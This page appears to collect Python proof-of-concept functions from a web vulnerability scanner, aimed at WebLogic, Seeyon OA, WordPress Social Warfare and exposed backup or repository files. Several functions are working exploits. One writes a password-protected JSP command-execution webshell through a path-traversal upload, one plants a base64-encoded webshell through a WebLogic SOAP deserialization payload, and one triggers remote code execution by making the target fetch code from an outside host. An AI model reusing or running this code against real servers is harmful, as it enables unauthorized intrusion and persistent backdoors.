Exemplo n.º 1
0
def poc(url):
    # 首先对url进行处理
    # url = "http://www.example.org:7001/default.html?ct=32&op=92&item=98"
    # --> http://www.example.org:7001
    if url[:4] != "http":
        url = "http://" + url
    o = urlparse(url)
    url = o.scheme + "://" + o.netloc

    # 首先判断attack_url是否可访问
    try:
        attack_url = url + '/_async/AsyncResponseService'
        r = request.get(url=attack_url,
                        headers=get_headers,
                        timeout=4,
                        verify=False)
        if r.status_code != 200:
            return []
    except:
        return []

    # 因为不知道目标是linux还是windows,所以直接都检验一遍
    # 如果存在漏洞,则将shell路径保存在webshell_path中
    webshell_path = []
    linux_check_1(url, webshell_path)
    linux_check_2(url, webshell_path)
    windows_check_1(url, webshell_path)
    windows_check_2(url, webshell_path)

    return webshell_path
Exemplo n.º 2
0
def poc(url):
    # url = "www.example.org/default.html?ct=32&op=92&item=98"
    # --> http://www.example.org
    if url[:4] != "http":
        url = "http://" + url
    o = urlparse(url)
    url = o.scheme + "://" + o.netloc
    headers = {
        "User-Agent":get_random_ua()
        }
    
    # shell_name can modify it yourself
    shell_name="config_db1.jsp"

    shell_url = url + "/seeyon/" + shell_name

    try:
        # just prevent being attacked
        res = request.get(shell_url, headers=headers, timeout=5, allow_redirects=False, verify=False)
        if res.status_code == 200 and ":-)" in res.text:
            return shell_url+'?pwd=fuckxxxx&cmd=cmd /c whoami'
    except:
        pass

    shell_name = "..\\..\\..\\ApacheJetspeed\\webapps\\seeyon\\" + shell_name
    # def_shell content can modufy iy youself
    def_shell = """<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();} %><%if("fuckxxxx".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd")) + "</pre>");}else{out.println(":-)");}%>"""
    def_shell = def_shell.encode()
    base_header = "REJTVEVQIFYzLjAgICAgIDM1NSAgICAgICAgICAgICAwICAgICAgICAgICAgICAgNjY2ICAgICAgICAgICAgIERCU1RFUD1PS01MbEtsVg0KT1BUSU9OPVMzV1lPU1dMQlNHcg0KY3VycmVudFVzZXJJZD16VUNUd2lnc3ppQ0FQTGVzdzRnc3c0b0V3VjY2DQpDUkVBVEVEQVRFPXdVZ2hQQjNzekIzWHdnNjYNClJFQ09SRElEPXFMU0d3NFNYekxlR3c0VjN3VXczelVvWHdpZDYNCm9yaWdpbmFsRmlsZUlkPXdWNjYNCm9yaWdpbmFsQ3JlYXRlRGF0ZT13VWdoUEIzc3pCM1h3ZzY2DQpGSUxFTkFNRT1xZlRkcWZUZHFmVGRWYXhKZUFKUUJSbDNkRXhReVlPZE5BbGZlYXhzZEdoaXlZbFRjQVRkZUFENXlSUUh3TG9pcVJqaWRnNjYNCm5lZWRSZWFkRmlsZT15UldaZEFTNg0Kb3JpZ2luYWxDcmVhdGVEYXRlPXdMU0dQNG9FekxLQXo0PWl6PTY2DQo="

    payload_head_len = 283 + len(f_base64encode(shell_name))
    payload_shell_len = len(def_shell)
    payload_shell = def_shell + bytes(hashlib.md5(def_shell).hexdigest(), 'utf-8')
    payload_shell_name = f_base64encode(shell_name)
    payload = bytes(base64.b64decode(base_header).decode().replace('355', str(payload_head_len)).replace('666', str(
        payload_shell_len)).replace('qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdeAD5yRQHwLoiqRjidg66',
                                    payload_shell_name), 'utf-8') + payload_shell
    try:
        request.post(url=url + "/seeyon/htmlofficeservlet", data=payload, headers=headers, timeout=5, allow_redirects=False, verify=False)
        res = request.get(url=shell_url, headers=headers, timeout=5, allow_redirects=False, verify=False).text
    except:
        return False

    if ":-)" in res:
        return shell_url+'?pwd=fuckxxxx&cmd=cmd /c whoami'
    else:
        return False
Exemplo n.º 3
0
def poc(url):
    headers = {
        "User-Agent":
        "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
    }
    payload = "/uddiexplorer/SearchPublicRegistries.jsp?operator=http://localhost/robots.txt&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search"
    vulnurl = url + payload
    try:
        req = request.get(vulnurl, headers=headers, timeout=10)
        if r"weblogic.uddi.client.structures.exception.XML_SoapException" in req.text and r"IO Exception on sendMessage" not in req.text:
            return True
        else:
            return False
    except:
        return False
Exemplo n.º 4
0
def poc(url):
    # url = "http://www.example.org/default.html?ct=32&op=92&item=98"
    # --> http://www.example.org
    if url[:4] != "http":
        url = "http://" + url
    o = urlparse(url)
    url = o.scheme + "://" + o.netloc + payload
    try:
        req = request.get(url, headers=headers, timeout=5, allow_redirects=False, verify=False)
        if req.status_code == 200:
            return url
        else:
            return False
    except:
        return False
Exemplo n.º 5
0
def bak_scan(url, payloads, result):
    headers = {"User-Agent": get_random_ua()}
    while not payloads.empty():
        payload = payloads.get()
        vulnurl = url + "/" + payload
        try:
            flag = 0
            # 如果是备份文件则不需要下载,只需要head方法获取头部信息即可,否则文件较大会浪费大量的时间
            if 'zip' in payload or 'rar' in payload or 'gz' in payload or 'sql' in payload:
                req = request.head(vulnurl,
                                   headers=headers,
                                   timeout=5,
                                   allow_redirects=False,
                                   verify=False)
                # 404页面 'Content-Type': 'application/octet-stream',
                # zip 'application/x-zip-compressed' 'application/zip'
                # rar 'application/octet-stream'  'application/x-rar-compressed'
                # 采用Content-Type过滤,还是有一定误报
                if req.status_code == 200:
                    if 'html' not in req.headers[
                            'Content-Type'] and 'image' not in req.headers[
                                'Content-Type']:
                        flag = 1
            # 当检验git和svn、hg时则需要验证返回内容,get方法
            else:
                req = request.get(vulnurl,
                                  headers=headers,
                                  timeout=5,
                                  verify=False,
                                  allow_redirects=False)
                if req.status_code == 200:
                    if 'svn' in payload:
                        if 'dir' in req.text and 'svn' in req.text:
                            flag = 1
                    elif 'git' in payload:
                        if 'repository' in req.text:
                            flag = 1
                    elif 'hg' in payload:
                        if 'hg' in req.text:
                            flag = 1
                    elif '/WEB-INF/web.xml' in payload:
                        if 'web-app' in req.text:
                            flag = 1
            if flag == 1:
                result.append(vulnurl)
        except Exception as e:
            # print(e)
            continue
Exemplo n.º 6
0
def linux_check_2(url, webshell_path):
    linux_payload_2 = r"""<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">   
        <soapenv:Header> 
        <wsa:Action>xx</wsa:Action>
        <wsa:RelatesTo>xx</wsa:RelatesTo>
        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
        <void class="java.lang.ProcessBuilder">
        <array class="java.lang.String" length="3">
        <void index="0">
        <string>/bin/bash</string>
        </void>
        <void index="1">
        <string>-c</string>
        </void>
        <void index="2">
        <string>echo PCUKICAgIGlmKCIxMjMiLmVxdWFscyhyZXF1ZXN0LmdldFBhcmFtZXRlcigicHdkIikpKXsKICAgICAgICBqYXZhLmlvLklucHV0U3RyZWFtIGluID0gUnVudGltZS5nZXRSdW50aW1lKCkuZXhlYyhyZXF1ZXN0LmdldFBhcmFtZXRlcigiY21kIikpLmdldElucHV0U3RyZWFtKCk7CiAgICAgICAgaW50IGEgPSAtMTsgICAgICAgICAgCiAgICAgICAgYnl0ZVtdIGIgPSBuZXcgYnl0ZVsxMDI0XTsgICAgICAgICAgCiAgICAgICAgb3V0LnByaW50KCI8cHJlPiIpOyAgICAgICAgICAKICAgICAgICB3aGlsZSgoYT1pbi5yZWFkKGIpKSE9LTEpewogICAgICAgICAgICBvdXQucHJpbnRsbihuZXcgU3RyaW5nKGIpKTsgICAgICAgICAgCiAgICAgICAgfQogICAgICAgIG91dC5wcmludCgiPC9wcmU+Iik7CiAgICB9IAogICAgJT4= |base64 -d > servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/webshell2.jsp</string>
        </void>
        </array>
        <void method="start"/></void>
        </work:WorkContext>
        </soapenv:Header>
        <soapenv:Body>
        <asy:onAsyncDelivery/>
        </soapenv:Body></soapenv:Envelope>"""

    try:
        attack_url = url + '/_async/AsyncResponseService'
        request.post(url=attack_url,
                     data=linux_payload_2,
                     headers=post_headers,
                     timeout=5,
                     verify=False)
        jsp_path = url + '/bea_wls_internal/webshell2.jsp'
        time.sleep(1)
        r = request.get(url=jsp_path,
                        headers=get_headers,
                        timeout=5,
                        verify=False)
        if r.status_code == 200:
            webshell_path.append("{}?pwd=123&cmd=whoami".format(jsp_path))
        else:
            pass
            # print("第二种方式失败")
    except Exception as e:
        pass
Exemplo n.º 7
0
def poc(url):
    #处理url
    if url[:4] != "http":
        url = "http://" + url
    o = urlparse(url)
    url = o.scheme + "://" + o.netloc

    #判断是否可以访问
    try:
        attack_url = url + '/admin/index/login.html'
        r = request.get(url=attack_url, headers=get_headers, timeout=4, verify=False)
        if r.status_code != 200:
            return []
    except:
        return []

    #检查
    attach_path=[]
    fast_check_1(url,attach_path)
    return attach_path
Exemplo n.º 8
0
def poc(url):
    # url = "http://www.example.org:8080/default.html?ct=32&op=92&item=98"
    # --> http://www.example.org:8080
    if url[:4] != "http":
        url = "http://" + url
    o = urlparse(url)
    url = o.scheme + "://" + o.netloc

    # 自定义的shell地址,内容为 <pre>eval($_REQUEST['z']);</pre>
    shellpath = "http://saucer-man.com/aa.txt"
    ## TODO 需要多余服务的统一整合
    # 执行的shell命令
    shell = "phpinfo();"

    vulnurl = url + "/wp-admin/admin-post.php?swp_debug=load_options&swp_url={shellpath}&z={shell}".format(
        shellpath=shellpath, shell=shell)
    try:
        headers = {"User-Agent": get_random_ua()}
        r = request.get(vulnurl,
                        headers=headers,
                        timeout=5,
                        verify=False,
                        allow_redirects=False)
        if r.status_code == 200 and "PHP Version" in r.text:
            return {
                'payload':
                vulnurl,
                'post_data':
                '',
                'info':
                'wordpress plugin Social Warfare <= 3.5.2 - Unauthenticated Remote Code Execution (RCE)'
            }
        else:
            return False
    except:
        return False